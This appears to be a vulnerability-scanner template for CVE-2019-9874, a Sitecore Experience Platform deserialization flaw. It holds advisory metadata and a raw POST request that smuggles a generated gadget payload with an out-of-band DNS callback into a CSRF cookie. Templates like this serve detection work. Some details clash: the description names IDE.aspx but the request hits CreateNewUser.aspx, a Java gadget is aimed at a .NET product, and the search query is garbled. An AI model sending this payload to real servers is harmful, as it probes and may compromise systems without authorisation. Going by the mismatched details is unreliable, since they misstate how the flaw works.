id: CVE-2019-9874 info: name: Sitecore Experience Platform - Deserialization of Untrusted Data author: ritikchaddha severity: critical description: | Sitecore Experience Platform before 8.2 Update-7 and 9.0 before Update-2 is vulnerable to a remote code execution vulnerability (CVE-2019-9874). An attacker can exploit this issue to execute arbitrary code on the affected system via a crafted request to the /sitecore/shell/Applications/Layouts/IDE.aspx endpoint. impact: | Attackers can execute arbitrary code remotely, potentially leading to full system compromise. remediation: | Update to the latest version of Sitecore or apply security patches addressing deserialization issues. reference: - https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf - https://nvd.nist.gov/vuln/detail/CVE-2019-9874 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-9874 epss-score: 0.87631 epss-percentile: 0.99487 cwe-id: CWE-502 cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: sitecore product: experience_platform shodan-query: http.html:"SitecoSitecore Experience Platform" fofa-query: body="Sitecore Experience Platform" tags: cve,cve2019,sitecore,deserialization,rce,kev,vkev,vuln http: - raw: - | POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: __CSRFCOOKIE={{randstr}}; __CSRFTOKEN={{generate_java_gadget("dns", "https://{{interactsh-url}}", "base64")}} matchers-condition: and matchers: - type: word part: body words: - "PotentialCsrfException" - "deserialization" condition: and case-insensitive: true - type: status status: - 500 # digest: 4a0a004730450220499585af59659aa5bc820098593949ba64bdf8989661fd1acc71ca3a8d4e3dc50221009a6d28b5506bcc72e7c9e92266fadc68bb0ae4ea21efd156f33b72a198675c21:922c64590222798bb761d5b6d8e72950